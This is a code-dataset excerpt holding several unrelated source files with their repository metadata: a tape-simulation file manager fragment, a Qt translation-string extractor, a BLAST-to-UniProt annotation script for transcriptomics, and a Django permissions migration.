self.simulation.log("Dump " + str(self) + " state.")
for i, item in enumerate(self.files):
self.simulation.log("%05d" % i, str(item), str(self.files[item]))
self.simulation.log(self.simulation.persistency.path)
| jakobluettgau/feo | tapesim/components/FileManager.py | Python | gpl-3.0 | 2,010 | 0.004478 |
#!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
import os
import sys
OUT_CPP="qt/yescoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *yescoin_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("yescoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
| thormuller/yescoin2 | share/qt/extract_strings_qt.py | Python | mit | 1,873 | 0.005873 |
#!/usr/bin/env python
import urllib
import sys
import os
##### totalannotation.py by DJ Barshis
##### This script takes an input fasta file of sequence names and sequences, and blast results files of blasts against
##### nr (parsed .txt with 1 hit per line) and swissprot and tremble (in -outfmt 7) uniprot databases
##### and downloads the corresponding uniprot flat files from the www.uniprot.org web server,
##### extracts particular annotation information from the nr blast and each uniprot flat file and combines it into a meta-annotation table.
##### you will need to create a 2-line .txt file that has the names of the particular columns you would like to extract from the
##### nr parsed blast file separated by tabs (these files can be large so I suggest extracting the header using head or less in terminal
##### the second line consists of the "bad words" you want to skip over in you nr results separated by tabs.
##### I usually use "predicted PREDICTED hypothetical unknown" or some combination thereof.
# usage is totalannotation.py YOUR_contigs.fasta BLASTx2nr.txt nrcolumnheadersandbadwords.txt BLASTx2Sprot.txt BLASTx2TrEMBL.txt evaluethreshold directoryforflatfiles(no slashes) outtablename.txt
#this is for setting how the script sorts your contigs into order
#change the word to 'text' for a text-based sorting or 'coral' for a
#palumbi-lab coral-specific numerical sorting
textorcoralsort = 'text'
#innames, inseqs read_fasta_lists(sys.argv[1])
#sys.argv[2] = BLASTx2nr.txt
#sys.argv[3] = thingsfornr.txt
#uniprotIDs read_uniprot(sys.argv[4], sys.argv[5])
evalue=float(sys.argv[6])
directory=sys.argv[7] #name only, no /'s
#o=open(str(sys.argv[8]), 'w') # New data table file name
#####This reads in a fasta file and extracts the sequence names into a dictionary as the keys
def read_fasta_dict(file):
fin = open(file, 'r')
filelines=fin.readlines()
filelines.append('EOF')
count=0
names={}
seqs=[]
numseqs=0
for line in filelines:
if line=='EOF':
names[cols[0]]='%i' %(len(seq))
line=line.strip()
if line and line[0] == '>': #indicates the name of the sequence
if count>=1:
names[cols[0]]='%i' %(len(seq))
count+=1
line=line[1:]
cols=line.split(' ')
seq=''
else: seq +=line
fin.close()
return names
innames=read_fasta_dict(sys.argv[1])
print 'Read in fasta of %i sequences: ...' %(len(innames.keys()))
####This function reads in a parsed (every hit on one line) nr blast file and extracts certain columns and returns a dictionary
def nr_dict(file, colstoextract):
fin = open(file, 'r') # open input file
cols2extract = open(colstoextract, 'r')
d={}
headers=[]
contig=''
linenum=0
goodnrhits=0
for line in fin:
linenum+=1
line=line.rstrip()
cols=line.split('\t')
if linenum == 1:
headers=line #Used to copy header to new files
# this loop is for extracting the column indexes for the column names specified on the first line of the stufffornr.txt file
extractlinecount=0
for aline in cols2extract:
extractlinecount+=1
if extractlinecount==1:
aline=aline.rstrip()
words=aline.split('\t')
hitdescription=cols.index(words[0])
nrEval=cols.index(words[1])
if linenum >1:
cols[0]=cols[0].split(' ')[0]
if cols[0] == contig:
# print line
d[cols[0]].append('%s\t%s' %(cols[hitdescription],cols[nrEval]))
else:
if float(cols[nrEval]) <= evalue:
goodnrhits+=1
contig = cols[0]
numhit = 1
d[cols[0]]=d.get(cols[0],[])
d[cols[0]].append('%s\t%s' %(cols[hitdescription],cols[nrEval]))
fin.close()
cols2extract.close()
return headers, d, goodnrhits
headers, d, goodnrhits=nr_dict(sys.argv[2], sys.argv[3])
print "Read in nr blast..."
print '%s%i' %('Number of good nr matches: ',goodnrhits)
print '%s%i' %('Number not matched in nr: ',len(innames.keys())-goodnrhits)
print "Searching for badwords..."
######This function parses the nr dictionary for hits that do not contain badwords (e.g. 'Predicted', 'hypothetical', etc.)
def parse_badwords(value, badwords):
onlybad=0
madegood=0
badhits=[]
goodhits=[]
tophit=value[0]
for each in value:
numbadhits=0
for item in badwords:
if item in each:
numbadhits+=1
if numbadhits >=1:
badhits.append(each)
if numbadhits == 0:
goodhits.append(each)
if len(goodhits)==0:
onlybad +=1
if len(goodhits)>=1:
madegood +=1
goodhits+=badhits
return tophit, goodhits, onlybad, madegood
badwordlist=[]
#reading in a list of badwords from stufffornr.txt
badwordfile=open(sys.argv[3],'r')
badwordline=0
for line in badwordfile:
badwordline+=1
if badwordline==2:
line=line.rstrip()
badwordlist=line.split('\t')
onlybadnrs=0
madegoodnrs=0
####this step loops through the entrys in your contig dictionary
####and calls the badword parser for each entry that has a match in the nr dictionary and returns the top hit and the top non-badword hit (if there is one)
for key,value in innames.items():
if d.has_key(key):
tophit, goodhits, onlybad, madegood= parse_badwords(d[key], badwordlist)
innames[key]='%s\t%s\t%s' %(innames[key],tophit, goodhits[0])
onlybadnrs+=onlybad
madegoodnrs+=madegood
else:
innames[key]+='\t%s\t%s\t%s\t%s' %('No_sig_nr_hit','No_sig_nr_hit','No_sig_nr_hit','No_sig_nr_hit')
print '%s%i' %('Number of nr hits with only a bad word hit: ', onlybadnrs)
print '%s%i' %('Number of nr hits with a good word hit: ', madegoodnrs)
#######This function reads in the swissprot and trembl outputs and returns
#######a dictionary that contains the top uniprot ID from swissprot (if available) or trembl (if no swissprot match was found)
def read_uniprot(sprotfile,tremblfile):
queryname=''
uniprotIDs={}
uniqueprotIDs={}
sprotmatch=0
tremblpeats=0
tremblmatch=0
sprot = open(sprotfile,'r')
trembl = open(tremblfile,'r')
for line in sprot:
line=line.rstrip()
if line[0] == '#':
continue
else:
cols=line.split('\t')
if cols[0] == queryname:
continue
else:
# if float(cols[10]) <= evalue and cols[1].split('|')[2].split('_')[1] != 'NEMVE': #for parsing based on threshold value and excluding hits to Nematostella
if float(cols[10]) <= evalue: #for parsing based on threshold value only
ID=cols[1].split('|')
uniprotIDs[cols[0]]=uniprotIDs.get(cols[0],[])
uniprotIDs[cols[0]].append(ID[1])
if innames.has_key(cols[0]):
sprotmatch+=1
innames[cols[0]]+='\t%s\t%s\t%s' %(ID[1],cols[2],cols[10])
queryname=cols[0]
if uniqueprotIDs.has_key(ID[1]):
continue
else:
uniqueprotIDs[uniprotIDs[cols[0]][0]]=''
print 'Read in swissprot blast ...'
print '%s%i' %('Number of good swissprot matches: ', sprotmatch)
for line in trembl:
line=line.rstrip()
if line[0] == '#':
continue
else:
cols=line.split('\t')
if cols[0] == queryname:
continue
else:
# if float(cols[10]) <= evalue and cols[1].split('|')[2].split('_')[1] != 'NEMVE': #for parsing based on threshold value
if float(cols[10]) <= evalue: #for parsing based on threshold value
ID=cols[1].split('|')
if uniprotIDs.has_key(cols[0]):
uniprotIDs[cols[0]].append(ID[1])
queryname=cols[0]
tremblpeats+=1
else:
uniprotIDs[cols[0]]=uniprotIDs.get(cols[0],[])
uniprotIDs[cols[0]].append(ID[1])
if innames.has_key(cols[0]):
innames[cols[0]]+='\t%s\t%s\t%s' %(ID[1],cols[2],cols[10])
queryname=cols[0]
tremblmatch+=1
if uniqueprotIDs.has_key(uniprotIDs[cols[0]][0]):
continue
else:
uniqueprotIDs[uniprotIDs[cols[0]][0]]=''
print 'Read in TrEMBL blast ...'
print '%s%i'%('Number of repeat matches from TrEMBL: ', tremblpeats)
print '%s%i'%('Number of additional good matches from TrEMBL: ', tremblmatch)
print '%s%i' %('flatfilesneeded: ',len(uniqueprotIDs.keys()))
return uniprotIDs, uniqueprotIDs
#this line calls the uniprot reading function
uniprotIDs, uniquesforflats=read_uniprot(sys.argv[4], sys.argv[5])
print 'downloading flat files ...'
#this loop downloads all the uniprot flat files for the list of unique uniprotIDs that was parsed from the blast results
for key, value in uniquesforflats.items():
if os.path.exists('./'+directory+'/'+key+'.txt'): #thanks JTL for this addition!
continue
else:
urllib.urlretrieve('http://www.uniprot.org/uniprot/'+key+'.txt', './'+directory+'/'+key+'.txt')
print 'extracting relevant info from flat files ...'
print 'don\'t worry this takes awhile ...'
########this function extracts the relevant information from each individual flat file
def extractGO(contigname):
if uniprotIDs.has_key(contigname):
flatfile = open('./'+directory+'/'+uniprotIDs[contigname][0]+'.txt','r')
ID='No_ID'
DE='No_description'
description=0
KEGG='No_KEGG'
KEGGKO='No_KEGGKO'
flatfiledict={}
GOcodes=''
GOBP=''
GOMF=''
GOCC=''
keywords=''
for line in flatfile:
line=line.rstrip()
if line[0:2] == 'ID':
line=line.split(' ')
ID=line[3]
if line[0:2] == 'DE' and description == 0:
line=line.split('=')
DE=line[1][:-1]
description +=1
if line[0:2] == 'DR':
if line[5:9] == 'KEGG':
line=line.split(';')
KEGG=line[1].strip()
if line[5:7] == 'KO':
line=line.split(';')
KEGGKO=line[1].strip()
if line[5:7] == 'GO':
line=line.split(';')
if GOcodes == '':
GOcodes+='%s' %(line[1].strip())
else:
GOcodes+=' // %s' %(line[1].strip())
if line[2].strip().split(':')[0] == 'C':
GOCC+='%s (%s);' %(line[2].strip().split(':')[1], line[1].strip())
if line[2].strip().split(':')[0] == 'P':
GOBP+='%s (%s);' %(line[2].strip().split(':')[1], line[1].strip())
if line[2].strip().split(':')[0] == 'F':
GOMF+='%s (%s);' %(line[2].strip().split(':')[1], line[1].strip())
if line[0:2] == 'KW':
line=line[2:].split(';')
for item in line:
if item == '':
continue
else:
keywords+='%s;' %(item.strip())
if GOcodes=='':
GOcodes='No_GOcodes'
if GOBP=='':
GOBP='No_GOBP'
if GOMF=='':
GOMF='No_GOMF'
if GOCC=='':
GOCC='No_GOCC'
if keywords=='':
keywords='No_keywords'
outstring='\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s' %(ID, DE, KEGG, KEGGKO, GOcodes, GOBP, GOMF, GOCC, keywords)
nomatch=0
else:
nomatch=1
outstring='\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s' %('No_Uniprotmatch','No_%_identity','No_evalue','No_ID','No_Description','No_KEGG', 'No_KEGGKO','No_GO','No_GOCC','No_GOBP','No_GOMF','No_keywords')
return outstring, nomatch
notmatched=0
extractingcounter=0
#####This loop calls the extraction function for each contig that has a uniprot match
for key, value in innames.items():
extractingcounter+=1
outstring, nomatch = extractGO(key)
innames[key]+=outstring
notmatched+=nomatch
o=open(str(sys.argv[8]), 'w') # New data table file name
o.write('%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n' %('ContigName', 'ContigLength', 'topnrMatch','topnrEvalue', 'nobadwordnrMatch', 'nobadwordnrEvalue','Uniprotmatch','%_identity','evalue','ID','Description','KEGG', 'KEGGKO','GO','GOCC','GOBP','GOMF','Keywords')) #used if you want a specific header and filename for each file
print '%s%i' %('Hits not matched in sprot: ', notmatched)
print 'compiling extracted information ...'
############this if for sorting your contigs based on text order#############
if textorcoralsort == 'text':
l=[]
for key,value in innames.items():
l.append((key,value))
l.sort()
for item in l:
o.write('%s\t%s\n' % (item[0], item[1])) #writes each line of the tuple as separate tab delimited text
o.close()
#############this is for sorting your contigs based on our coral specific contig names##############
if textorcoralsort == 'coral':
l=[]
joinedcontigcounter=600247
for key,value in innames.items():
name=key.split(' ')
if name[0][0:6]=='contig':
newname=name[0].split('_')
if len(newname)==1:
num=int(newname[0][6:])
if len(newname)>1:
joinedcontigcounter+=1
num=joinedcontigcounter
if name[0][0:6]=='c_sym_':
newname=name[0].split('_')
num=700000+int(newname[2])
if name[0][0:6]=='d_sym_':
newname=name[0].split('_')
num=900000+int(newname[2])
l.append((num,key,value))
l.sort()
for item in l:
# print item
o.write('%s\t%s\n' % (item[1], item[2])) #writes each line of the tuple as separate tab delimited text
o.close()
| cuttlefishh/papers | vibrio-fischeri-transcriptomics/code/python/totalannotation_v1-1.py | Python | mit | 12,403 | 0.048859 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-07-03 08:35
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('organization_projects', '0087_auto_20190619_2052'),
]
operations = [
migrations.AlterModelOptions(
name='project',
options={'ordering': ['title'], 'permissions': (('user_add', 'Mezzo - User - User can add its own content'), ('user_edit', 'Mezzo - User - User can edit its own content'), ('user_delete', 'Mezzo - User - User can delete its own content'), ('team_add', 'Mezzo - User - Team can add its own content'), ('team_edit', "Mezzo - Team - User can edit his team's content"), ('team_delete', "Mezzo - Team - User can delete his team's content")), 'verbose_name': 'project', 'verbose_name_plural': 'projects'},
),
migrations.AlterModelOptions(
name='projectpage',
options={'permissions': (('user_add', 'Mezzo - User - User can add its own content'), ('user_edit', 'Mezzo - User - User can edit its own content'), ('user_delete', 'Mezzo - User - User can delete its own content'), ('team_add', 'Mezzo - User - Team can add its own content'), ('team_edit', "Mezzo - Team - User can edit his team's content"), ('team_delete', "Mezzo - Team - User can delete his team's content"))},
),
]
| Ircam-Web/mezzanine-organization | organization/projects/migrations/0088_auto_20190703_1035.py | Python | agpl-3.0 | 1,401 | 0.001428 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.